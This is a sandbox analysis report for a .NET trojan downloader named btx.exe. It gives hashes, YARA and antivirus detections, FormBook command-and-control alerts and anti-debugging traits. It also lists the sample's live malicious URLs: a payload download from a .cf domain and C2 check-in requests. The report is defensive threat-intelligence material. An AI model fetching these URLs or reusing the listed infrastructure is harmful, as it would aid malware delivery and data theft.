popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

btx.exe

AntiVM PE32 AntiDebug PE File .NET EXE
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 May 18, 2022, 10:33 a.m. May 18, 2022, 10:58 a.m.
Size 66.0KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 a6e96bf0130722d75c0ce9715bc2e483
SHA256 4c8956ad9aa80821657a61c424c56e194c285b4f675faa653623fab276a40242
CRC32 B5BB36AD
ssdeep 768:ZFT/CVoioiBBBBBBBBBBBBBBBBBBBBBRbT8cqBBBBBBBBBB9BifZ:ZFT/CVoioq71fZ
Yara
  • IsPE32 - (no description)
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • Is_DotNET_EXE - (no description)
  • PE_Header_Zero - PE File Signature

Name Response Post-Analysis Lookup
www.thebeautifullifeofthearth.com
A 192.0.78.25
A 192.0.78.24
CNAME thebeautifullifeofthearth.com
192.0.78.25
www.mommoth.club
A 23.88.111.156
23.88.111.156
a1prestige.cf
A 192.185.174.178
192.185.174.178
www.rameshgoostar.com
IP Address Status Action
164.124.101.2 Active Moloch
192.0.78.25 Active Moloch
192.185.174.178 Active Moloch
23.88.111.156 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49163 -> 192.185.174.178:80 2031092 ET HUNTING Request to .CF Domain with Minimal Headers Potentially Bad Traffic
TCP 192.168.56.101:49168 -> 23.88.111.156:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 23.88.111.156:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 23.88.111.156:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 192.0.78.25:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 192.0.78.25:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 192.0.78.25:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
UDP 192.168.56.101:55871 -> 164.124.101.2:53 2025107 ET INFO DNS Query for Suspicious .cf Domain Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Waiting for 2
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: seconds, press a key to continue ...
console_handle: 0x00000007
1 1 0
suspicious_features GET method with no useragent header suspicious_request GET http://a1prestige.cf/m/Tbqzh_Upfmzfqb.jpg
suspicious_features GET method with no useragent header suspicious_request GET http://www.mommoth.club/sn12/?oPqpRL=M1FrCRBfZI4URM1OR9+PPRBG9+ZjtDf1KcSpQBV/o5qXUsKvPLp9knFexYRpxxJTz8QEmRaD&Lv0h=ZTypDbLPA
suspicious_features GET method with no useragent header suspicious_request GET http://www.thebeautifullifeofthearth.com/sn12/?oPqpRL=+bAqrraOPFP6G7VNldvEvmQlIsf6EpITHpJV0mplF4OII8J3s/Rhv2hUxoigmbYJPULf8A1w&Lv0h=ZTypDbLPA
request GET http://a1prestige.cf/m/Tbqzh_Upfmzfqb.jpg
request GET http://www.mommoth.club/sn12/?oPqpRL=M1FrCRBfZI4URM1OR9+PPRBG9+ZjtDf1KcSpQBV/o5qXUsKvPLp9knFexYRpxxJTz8QEmRaD&Lv0h=ZTypDbLPA
request GET http://www.thebeautifullifeofthearth.com/sn12/?oPqpRL=+bAqrraOPFP6G7VNldvEvmQlIsf6EpITHpJV0mplF4OII8J3s/Rhv2hUxoigmbYJPULf8A1w&Lv0h=ZTypDbLPA
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1660
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00860000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Bkav W32.AIDetectNet.01
Lionic Trojan.MSIL.Agent.a!c
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
McAfee Artemis!A6E96BF01307
Cylance Unsafe
CrowdStrike win/malicious_confidence_100% (W)
Alibaba TrojanDownloader:MSIL/DropperX.ab120718
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of MSIL/TrojanDownloader.Agent.LUK
APEX Malicious
Avast Win32:DropperX-gen [Drp]
Kaspersky HEUR:Trojan-Downloader.MSIL.Agent.gen
Tencent Msil.Trojan-downloader.Agent.Lpbl
McAfee-GW-Edition Artemis!Trojan
Sophos Mal/Generic-S
Ikarus Win32.Outbreak
Webroot W32.Dropper.Gen
Kingsoft Win32.Troj.Undef.(kcloud)
ZoneAlarm HEUR:Trojan-Downloader.MSIL.Agent.gen
Microsoft TrojanDownloader:MSIL/AgentTesla.ESH!MTB
Malwarebytes Generic.Malware/Suspicious
SentinelOne Static AI - Suspicious PE
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Agent.LUK!tr
BitDefenderTheta Gen:NN.ZemsilF.34666.em0@aOi9hyf
AVG Win32:DropperX-gen [Drp]
Cybereason malicious.e51a0f
Paloalto generic.ml